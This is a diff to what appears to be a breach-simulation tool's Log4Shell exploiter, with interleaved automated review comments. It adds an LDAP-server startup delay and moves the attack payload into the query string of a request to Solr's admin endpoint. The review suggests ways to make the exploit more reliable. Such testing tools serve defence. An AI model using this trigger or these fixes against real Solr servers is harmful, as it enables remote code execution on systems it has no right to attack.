diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py
index 46129dfe3..e693881f1 100644
--- a/monkey/infection_monkey/exploit/log4shell.py
+++ b/monkey/infection_monkey/exploit/log4shell.py
@@ -34,6 +34,7 @@ class Log4ShellExploiter(WebRCE):
 _EXPLOITED_SERVICE = "Log4j"
 DOWNLOAD_TIMEOUT = 15
 REQUEST_TO_VICTIM_TIME = 5 # How long the request from victim to monkey might take. In seconds
+ LDAP_SERVER_INIT_DELAY = 5 # Time period that code halts waiting for ldap server to start
 def __init__(self, host: VictimHost):
 super().__init__(host)
@@ -111,6 +112,8 @@ class Log4ShellExploiter(WebRCE):
 # constructor directly after merging to the agent-refactor branch.
 self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
 self._ldap_server_thread.start()
+ logger.debug(f"Sleeping {Log4ShellExploiter.LDAP_SERVER_INIT_DELAY} seconds for ldap process to start")
+ sleep(Log4ShellExploiter.LDAP_SERVER_INIT_DELAY)
 def _stop_servers(self):
 logger.debug("Stopping all LDAP and HTTP Servers")
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
index 8078a106c..7bdc3fb42 100644
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py
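Review bot: In the second log4shell.py hunk (`@@ -111,6 +112,8 @@`), the fixed `sleep(Log4ShellExploiter.LDAP_SERVER_INIT_DELAY)` only guesses at when the LDAP server thread is ready: a slow start still races whatever runs next, and a fast start blocks the exploiter for the full five seconds. If the LDAP server class can expose a readiness signal (not visible here), it could set a `threading.Event` once its listener is bound, and this method could call `ready.wait(timeout=Log4ShellExploiter.LDAP_SERVER_INIT_DELAY)` instead, `ready` being a name I am proposing. The new constant's comment in the first hunk should state its unit like the line above it, e.g. `# Seconds to wait for the LDAP server to start`. The log text says "ldap process" although the server is started as a `Thread`, and whether `sleep` is imported cannot be confirmed from these hunks; the enclosing method begins outside the hunk.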
@@ -13,9 +13,10 @@ class SolrExploit(IServiceExploiter):
 @staticmethod
 def trigger_exploit(payload: str, host: VictimHost, port: int):
- url = f"http://{host.ip_addr}:{port}/solr/admin/cores"
- payload = {"foo": payload}
+ url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
 try:
- resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
+ logger.debug("Sending malicious SOLR log4j request")
+ requests.post(url, timeout=5, verify=False) # noqa DUO123
+ logger.debug("Request sent")
 except requests.ReadTimeout as e:
 logger.debug(f"Log4shell request failed {e}")
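Review bot: The new `try` body is still covered only by `except requests.ReadTimeout`, so a refused connection or a connect timeout propagates out of `trigger_exploit` instead of being logged; widening the handler to `except requests.RequestException as e:` would report every transport failure through the same debug line. The "Request sent" message is emitted for any completed response, including an error status, so logging the status code or wording it as `logger.debug("Request completed")` would be more accurate. Since the payload now travels in the query string rather than the form body, a short comment saying so (for example `# Payload is in the query string, so it typically shows up in request-line logs`) would help whoever correlates the simulation with web or proxy logs. The end of `trigger_exploit` is not visible in this hunk.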